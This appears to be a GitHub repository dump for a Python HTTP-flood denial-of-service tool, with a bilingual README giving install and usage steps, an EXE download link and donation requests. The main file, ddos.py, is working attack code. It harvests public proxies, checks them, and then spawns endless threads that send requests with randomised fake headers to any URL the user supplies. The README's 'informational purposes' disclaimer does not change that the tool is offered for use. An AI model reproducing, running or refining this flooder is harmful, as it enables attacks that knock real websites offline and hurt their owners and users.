├── README.md
├── ddos.py
└── logo.png
/README.md:
--------------------------------------------------------------------------------
1 | [](https://www.python.org/) [](https://GitHub.com/fsystem88/dos-attack/graphs/contributors/) 
2 |
3 | # DoS attack
4 | 
5 | The program uses a simple type of DDoS attack "HTTP flood" using multithreading and bots (proxy servers). The program was created for informational purposes!
6 | Программа использует простой тип DDoS-атаки "HTTP flood" с использованием многопоточности и ботов (прокси-серверов). Программа была создана в информационных целях!
7 |
8 | # Обязательно подпишитесь на канал в телеграме, там может решаться дальнейшая судьба проекта или очень важная информация!!!
9 |
---> Канал в Telegram <---
10 |
11 | # Установка
12 | apt update && apt upgrade -y
13 | apt install git python -y
14 | python3 -m pip install requests colorama click fake_headers
15 | git clone https://github.com/FSystem88/dos-attack
16 | cd dos-attack
17 |
18 | # Запуск
19 | python3 ddos.py --help
20 | Usage: ddos.py [OPTIONS]
21 |
22 | Options:
23 | -p, --proxy TEXT File with a proxy
24 | -u, --url TEXT URL
25 | --help Show this message and exit.
26 |
27 | Либо просто:
28 |
29 | python3 ddos.py
30 |
31 | # For Windows
32 | Просто скачать и заупстить EXE:
33 | [DDOS.exe](https://github.com/FSystem88/dos-attack/releases/download/v4/DDOS.exe)
34 |
35 | # Обновить
36 | cd ~/dos-attack/ && git pull
37 |
38 | # Приму в дар деньги на пиво! :))
39 | в любой валюте))
40 | Донатерная!
41 | 1. [Tinkoff](https://www.tinkoff.ru/rm/godunov.ivan1/jlHwa57720)
42 | 3. [YANDEX MONEY](https://yoomoney.ru/to/410015440700904)
43 |
44 | Free programmers also need to eat :)
45 |
46 |
--------------------------------------------------------------------------------
/ddos.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- coding: utf-8 -*-
3 | # Dev: FSystem88
4 | # Version: 5
5 |
6 | import requests as r, os, threading, random, click, fake_headers
7 | from threading import Thread
8 | from colorama import Fore, Style, Back
9 | from fake_headers import Headers
10 |
11 | def clear():
12 | if os.name == 'nt':
13 | os.system('cls')
14 | else:
15 | os.system('clear')
16 |
17 | def logo():
18 | print(Fore.GREEN+"\n██████"+Fore.RED+"╗░"+Fore.GREEN+"██████"+Fore.RED+"╗░░"+Fore.GREEN+"█████"+Fore.RED+"╗░░"+Fore.GREEN+"██████"+Fore.RED+"╗"+Fore.GREEN+"███████"+Fore.RED+"╗"+Fore.GREEN+"██████"+Fore.RED+"╗░"+Fore.GREEN+"\n"+Fore.GREEN+"██"+Fore.RED+"╔══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"██"+Fore.RED+"╔══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"██"+Fore.RED+"╔══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"██"+Fore.RED+"╔════╝"+Fore.GREEN+"██"+Fore.RED+"╔════╝"+Fore.GREEN+"██"+Fore.RED+"╔══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"\n"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║╚"+Fore.GREEN+"█████"+Fore.RED+"╗░"+Fore.GREEN+"█████"+Fore.RED+"╗░░"+Fore.GREEN+"██████"+Fore.RED+"╔╝"+Fore.GREEN+"\n"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║░╚═══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"██"+Fore.RED+"╔══╝░░"+Fore.GREEN+"██"+Fore.RED+"╔══"+Fore.GREEN+"██"+Fore.RED+"╗"+Fore.GREEN+"\n"+Fore.GREEN+"██████"+Fore.RED+"╔╝"+Fore.GREEN+"██████"+Fore.RED+"╔╝╚"+Fore.GREEN+"█████"+Fore.RED+"╔╝"+Fore.GREEN+"██████"+Fore.RED+"╔╝"+Fore.GREEN+"███████"+Fore.RED+"╗"+Fore.GREEN+"██"+Fore.RED+"║░░"+Fore.GREEN+"██"+Fore.RED+"║"+Fore.GREEN+"\n"+Fore.RED+"╚═════╝░╚═════╝░░╚════╝░╚═════╝░╚══════╝╚═╝░░╚═╝"+Fore.YELLOW+"\n\n[ Dev: FSystem88 ~ prod. by Ca$h&Мир ]\n[ The program uses a simple type of DDoS attack\n \"HTTP flood\" using multithreading and a proxies ]\n[ The program was created for informational purposes !!! ]\n\n"+Fore.GREEN+"[ Qiwi: https://qiwi.com/n/FSYSTEM88 ]\n"+Style.RESET_ALL)
19 |
20 | def check_prox(array, url):
21 | ip = r.post("http://ip.beget.ru/").text
22 | for prox in array:
23 | thread_list = []
24 | t = threading.Thread (target=check, args=(ip, prox, url))
25 | thread_list.append(t)
26 | t.start()
27 |
28 | def check(ip, prox, url):
29 | try:
30 | ipx = r.get("http://ip.beget.ru/", proxies={'http': "http://{}".format(prox), 'https':"http://{}".format(prox)}).text
31 | except:
32 | ipx = ip
33 | if ip != ipx:
34 | print(Fore.BLACK+Back.GREEN+"{} good! Starting...".format(prox)+Style.RESET_ALL)
35 | thread_list = []
36 | t = threading.Thread (target=ddos, args=(prox, url))
37 | thread_list.append(t)
38 | t.start()
39 |
40 | def ddos(prox, url):
41 | proxies={"http":"http://{}".format(prox), "https":"http://{}".format(prox)}
42 | colors = [Fore.RED, Fore.GREEN, Fore.YELLOW, Fore.BLUE, Fore.CYAN, Fore.MAGENTA, Fore.WHITE]
43 | color = random.choice(colors)
44 | while True:
45 | headers = Headers(headers=True).generate()
46 | thread_list = []
47 | t = threading.Thread (target=start_ddos, args=(prox, url, headers, proxies, color))
48 | thread_list.append(t)
49 | t.start()
50 |
51 | def start_ddos(prox, url, headers, proxies, color):
52 | try:
53 | s = r.Session()
54 | req = s.get(url, headers=headers, proxies=proxies)
55 | if req.status_code == 200:
56 | print(color+"{} send requests...".format(prox))
57 | except:
58 | pass
59 |
60 | @click.command()
61 | @click.option('--proxy', '-p', help="File with a proxy")
62 | @click.option('--url', '-u', help="URL")
63 | def main(proxy, url):
64 | clear()
65 | logo()
66 | if url == None:
67 | url = input("URL: ")
68 | if url[:4] != "http":
69 | print(Fore.RED+"Enter the full URL (example: http*://****.**/)"+Style.RESET_ALL)
70 | exit()
71 | if proxy == None:
72 | while True:
73 | req = r.get("https://api.proxyscrape.com/?request=displayproxies")
74 | array = req.text.split()
75 | print(Back.YELLOW+Fore.WHITE+"Found {} new proxies".format(len(array))+Style.RESET_ALL)
76 | check_prox(array, url)
77 | else:
78 | try:
79 | fx = open(proxy)
80 | array = fx.read().split()
81 | print("Found {} proxies in {}.\nChecking proxies...".format(len(array), proxy))
82 | check_prox(array, url)
83 | except FileNotFoundError:
84 | print(Fore.RED+"File {} not found.".format(proxy)+Style.RESET_ALL)
85 | exit()
86 |
87 | main()
88 |
--------------------------------------------------------------------------------
/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/FSystem88/dos-attack/5b90bdc63d0250766adfab2877372fadd4d1ddbb/logo.png
--------------------------------------------------------------------------------